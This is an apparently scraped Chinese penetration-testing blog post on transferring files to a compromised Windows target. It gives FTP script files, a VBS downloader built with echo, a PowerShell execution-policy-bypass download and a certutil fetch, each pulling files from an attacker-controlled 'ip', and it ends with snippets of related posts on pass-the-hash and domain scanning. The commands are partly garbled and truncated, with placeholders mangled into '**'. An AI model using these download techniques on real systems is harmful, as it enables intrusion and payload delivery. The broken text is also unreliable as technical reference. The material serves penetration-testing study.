vbspowershell
bitsadmin
certutil
我們可以在本地伺服器先搭建乙個ftp伺服器
建立乙個使用者
echo open ip >>ftp.txt //連線到ftp伺服器
echo monster >>ftp.txt //輸入使用者名稱
echo abc123456 >>ftp.txt //輸入密碼
echo bin >>ftp.txt //開始
echo bye >>ftp.txt //關閉連線
ftp -s:ftp.txtvbs是windows中基於visual basic的指令碼語言。
利用vbs上傳,主要使用的是msxm12.xmlhttp和adodb.stream物件。
通過shell向靶機寫入vbs**
具體**如下
,"ip/檔案",0
>>download.vbs
echo post.
send()
>>download.vbs
echo set aget =
createobject
("adodb.stream"
)>>download.vbs
echo aget.mode =
3>>download.vbs
echo aget.type =
1>>download.vbs
echo aget.
open()
>>download.vbs
echo aget.
write
(post.responsebody)
>>download.vbs,2
>>download.vbs
cscript download.vbs 成功「上傳」檔案至靶機。powershell -exec bypass -c (new-object system.net.webclient)
.downloadfile
('ip/檔案',)
;
這裡要注意三點
certutil -urlcache -split -f ip/檔案windows內網滲透PTH PTK攻擊
windows內網滲透中,有三種最常用的pass系列攻擊 windows使用者hash主要由以下部分組成,其中ntlm hash比lm hash的安全性要更高 使用者名稱 rid lm hash值 ntlm hash值自windows vista和windows server 2008開始,wind...
內網滲透之windows基礎3
一.windows access token 訪問令牌 access tokens 是windows作業系統安全性的乙個概念。當使用者登陸時,系統建立乙個訪問令牌,裡面包含登入程序返回的sid和由本地安全策略分配給使用者和使用者的安全組的特權列表。以該使用者身份執行的的所有程序都擁有該令牌的乙個拷貝...
內網滲透之域內埠掃瞄
內網滲透測試之域內埠掃瞄 port scanning of intranet pentest in domain 來自我超怕的 通過埠掃瞄主要用於得到埠的banner資訊 埠上執行的服務 發現常見應用的預設埠。快速探測主機是否存在常見的高危埠 metasploit滲透測試利器,提供了很多漏洞利用 掃...